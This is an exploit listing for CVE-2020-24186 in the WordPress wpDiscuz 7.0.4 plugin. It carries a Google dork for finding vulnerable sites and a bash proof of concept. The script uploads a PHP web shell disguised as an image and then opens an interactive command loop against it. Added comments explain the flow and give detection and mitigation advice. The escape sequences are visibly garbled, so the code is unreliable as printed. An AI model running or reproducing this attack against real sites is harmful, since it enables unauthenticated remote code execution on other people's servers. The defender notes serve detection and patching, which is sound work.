Authored by Chloe Chamberland, Juampa Rodriguez

WordPress wpDiscuz plugin version 7.0.4 remote shell upload exploit.

advisories | CVE-2020-24186

# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/wpdiscuz/
# Date: 2021-06-06
# Original Author: Chloe Chamberland
# Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0
# Vendor Homepage: https://gvectors.com/
# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
# Version: 7.0.4
# Tested on: Ubuntu / WordPress 5.6.2
# CVE : CVE-2020-24186

#!/bin/bash
# Archived proof-of-concept for CVE-2020-24186 (wpDiscuz 7.0.4, unauthenticated
# file upload via the comment-attachment AJAX action). Kept here as a reference
# listing; as printed on this page the escape sequences in the echo strings and
# the multipart body appear garbled (bare `n` / `x0dx0a` where escapes would be
# expected), so the text is reproduced as-is.
#
# Flow, as the code below shows:
#   1. $1 = host, $2 = path of an existing post with comments enabled.
#   2. Fetch the post, confirm a "200 OK" status line.
#   3. Scrape the wmuSecurity nonce out of the post HTML.
#   4. POST a multipart body to /wp-admin/admin-ajax.php with
#      action=wmuUploadFiles, the nonce, and a wmu_files[0] part whose
#      filename is a.php but which is declared as image/jpeg and starts
#      with a "GIF8" magic prefix; the response is parsed for the stored URL.
#   5. Loop, sending the user's input as the `cmd` query parameter.
#
# Defender notes (all derived from the request the script builds):
#   - Detection: POST to admin-ajax.php with action=wmuUploadFiles carrying a
#     part whose filename ends in .php, and a Content-Type/magic-byte mismatch
#     (image/jpeg + "GIF8" prefix on PHP source). Access-log requests to a
#     freshly uploaded .php under the upload directory with a ?cmd= parameter
#     are the post-exploitation signal.
#   - Mitigation: update the plugin past the affected 7.0.4 release; deny PHP
#     execution in the uploads directory; validate upload type by content and
#     extension rather than by the client-supplied Content-Type header.
#
# NOTE(review): no `set -euo pipefail`; $1/$2 are unquoted in the tests below,
# so an empty or space-containing argument changes the test semantics.

if [ -z $1 ]
then
# Runtime strings are reproduced verbatim, including the apparent lost escapes.
echo -e "n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]n"
exit 0
elif [ -z $2 ]
then
echo -e "n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]n"
exit 0
else

# Plain http only: the URL is built from $1$2 with no scheme handling.
# -sI fetches headers only; head -n1 keeps the status line.
post=$(curl -sI http://$1$2/ | head -n1)

# Proceed only when the status line contains "200 OK".
if [[ "$post" == *"200 OK"* ]]; then
# Nonce scrape: the sed is presumably meant to break the HTML before each
# "wmuSecurity" token (the inserted `n` reads as a mangled newline); the nonce
# is then taken as the third double-quote-delimited field of the matching line.
wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3)
# Upload request. -i includes response headers, -s silent, -k ignores TLS
# verification (moot for http). The multipart parts are: action=wmuUploadFiles,
# wmu_nonce=$wmu_nonce, wmuAttachmentsData=undefined, wmu_files[0] (filename
# a.php, declared image/jpeg, body starting with GIF8), and postId hard-coded
# to 18 regardless of $2. The pipeline then isolates the first `http:/...`
# value from the JSON response; the trailing sed appears to be a mangled
# backslash-stripping substitution.
webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="action"x0dx0ax0dx0awmuUploadFilesx0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="wmu_nonce"x0dx0ax0dx0a'$wmu_nonce$'x0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="wmuAttachmentsData"x0dx0ax0dx0aundefinedx0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="wmu_files[0]"; filename="a.php" Content-Type: image/jpegx0dx0ax0dx0aGIF8x0dx0a<?phpx0dx0aif(isset($_REQUEST['cmd'])){x0dx0a $cmd = ($_REQUEST['cmd']);x0dx0a system($cmd);x0dx0a die;x0dx0a}x0dx0a?>x0dx0a-----------------------------WebKitFormBoundaryUnD3sx0dx0aContent-Disposition: form-data; name="postId"x0dx0ax0dx0a18x0dx0a-----------------------------WebKitFormBoundaryUnD3s--x0dx0a' http://$1/wp-admin/admin-ajax.php | sed 's/":"http/nhttp/g' | grep "http:\/" | cut -d '"' -f1 | sed 's///g')

# No check that $webshell is non-empty: an unsuccessful upload still prints
# the banner below and enters the loop.
echo -e "nWebshell:" $webshell"n"
echo -e "--------------WIN--------------"
echo -e " ¡Got webshell! "
echo -e "-------------------------------n"
# Interactive loop: each line read is sent verbatim as the `cmd` query
# parameter (unquoted, not URL-encoded; `read` without -r interprets
# backslashes). grep -v drops the GIF8 prefix line from the response.
while :
do
read -p '$ ' command
curl -s $webshell?cmd=$command | grep -v GIF8
done
else
echo -e "n[!] The indicated post was not foundn"
fi
fi